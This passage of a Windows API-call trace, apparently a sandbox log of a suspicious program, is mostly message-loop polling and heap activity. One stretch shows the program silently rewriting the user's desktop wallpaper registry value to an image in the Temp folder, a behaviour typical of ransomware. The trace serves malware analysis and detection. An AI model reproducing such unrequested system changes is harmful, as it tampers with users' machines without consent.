lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.241] Sleep (dwMilliseconds=0xa) [0308.257] timeGetTime () returned 0x4cf9c [0308.257] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.257] Sleep (dwMilliseconds=0xa) [0308.272] timeGetTime () returned 0x4cfac [0308.272] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.272] Sleep (dwMilliseconds=0xa) [0308.288] timeGetTime () returned 0x4cfbb [0308.288] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.288] Sleep (dwMilliseconds=0xa) [0308.303] timeGetTime () returned 0x4cfcb [0308.303] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.303] Sleep (dwMilliseconds=0xa) [0308.319] timeGetTime () returned 0x4cfdb [0308.319] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.319] Sleep (dwMilliseconds=0xa) [0308.334] timeGetTime () returned 0x4cfea [0308.334] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0308.334] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0308.335] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0308.335] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0308.335] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0308.335] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.335] Sleep (dwMilliseconds=0xa) [0308.350] timeGetTime () returned 0x4cffa [0308.350] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.350] Sleep (dwMilliseconds=0xa) [0308.365] timeGetTime () returned 0x4d009 [0308.366] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.366] Sleep (dwMilliseconds=0xa) [0308.381] timeGetTime () returned 0x4d019 [0308.381] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.381] Sleep (dwMilliseconds=0xa) [0308.397] timeGetTime () returned 0x4d029 [0308.397] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.397] Sleep (dwMilliseconds=0xa) [0308.412] timeGetTime () returned 0x4d038 [0308.412] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.413] Sleep (dwMilliseconds=0xa) [0308.428] timeGetTime () returned 0x4d048 [0308.428] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.428] Sleep (dwMilliseconds=0xa) [0308.444] timeGetTime () returned 0x4d057 [0308.444] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.444] Sleep (dwMilliseconds=0xa) [0308.459] timeGetTime () returned 0x4d067 [0308.459] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.459] Sleep (dwMilliseconds=0xa) [0308.475] timeGetTime () returned 0x4d077 [0308.475] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.475] Sleep (dwMilliseconds=0xa) [0308.490] timeGetTime () returned 0x4d086 [0308.490] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.491] Sleep (dwMilliseconds=0xa) [0308.506] timeGetTime () returned 0x4d096 [0308.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0308.506] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0308.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0308.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0308.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0308.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0308.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0308.508] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0308.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0308.509] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0308.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0308.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0308.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0308.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0308.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0308.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0308.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0308.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0308.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0308.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0308.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0308.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0308.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0308.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0308.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0308.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0308.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0308.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0308.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0308.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0308.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0308.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0308.512] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0308.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0308.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0308.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0308.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0308.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0308.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0308.513] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0308.513] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0308.514] RegCloseKey (hKey=0x294) returned 0x0 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0308.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0308.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0308.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0308.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0308.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0308.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0308.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0308.515] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0308.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0308.515] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0308.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0308.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0308.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0308.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0308.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0308.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0308.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0308.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0308.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0308.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0308.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0308.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0308.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0308.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0308.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0308.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0308.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0308.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0308.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0308.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0308.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0308.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0308.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0308.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0308.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0308.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0308.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0308.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0308.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0308.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0308.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0308.521] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0308.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0308.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0308.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0308.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0308.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0308.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0308.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0308.522] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0308.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0308.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0308.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0308.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0308.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0308.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 